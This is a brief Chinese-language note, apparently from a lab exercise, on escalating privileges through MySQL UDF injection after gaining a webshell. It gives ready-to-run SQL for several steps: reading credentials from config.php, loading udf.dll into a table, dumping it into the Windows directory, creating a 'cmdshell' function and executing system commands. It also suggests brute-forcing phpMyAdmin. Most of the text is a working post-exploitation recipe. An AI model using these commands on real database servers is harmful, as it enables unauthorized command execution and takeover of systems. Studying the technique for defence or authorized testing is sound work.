数据库提权较为实用,但只有在root权限才可以提权
mysql提权(udf提权)
借用于mysql func,对认证的用户,只要拥有INSERT和DELETE权限,就可以在任意数据库下l创建一个函数攻击数据库
拿到webshell后先看数据库,一般存放于inc目录,配置文件是config.php
拿到账号密码直接登录
传udf.dll
mysql版本大于5.1时,udf.dll要放在mysql\lib\plugin目录下,小于5.1时,文件放在C盘windows目录或windows32
如果没有plugin目录,就自己创建一个
首先创建一个表
create table udfeval(shellcode longblob);
将udf写进创建的表中
insert into udfeval values(load_file('dll绝对路径'));
靶场做过处理,不需要传进plugin文件夹
将创建的表里的信息导出
靶场数据库版本为5.0
select shellcode from udfeval into dumpfile 'C://windows/udf.dll';
创建函数
create function cmdshell returns string soname 'udf.dll';
验证函数是否存在
select * from func;
验证权限
select cmdshell('whoami');
如果有phpmyadmin等边缘资产可以尝试弱口令、爆破、漏洞
注意:数据库是root权限,其次有INSERT和DELETE权限,根据版本号传udf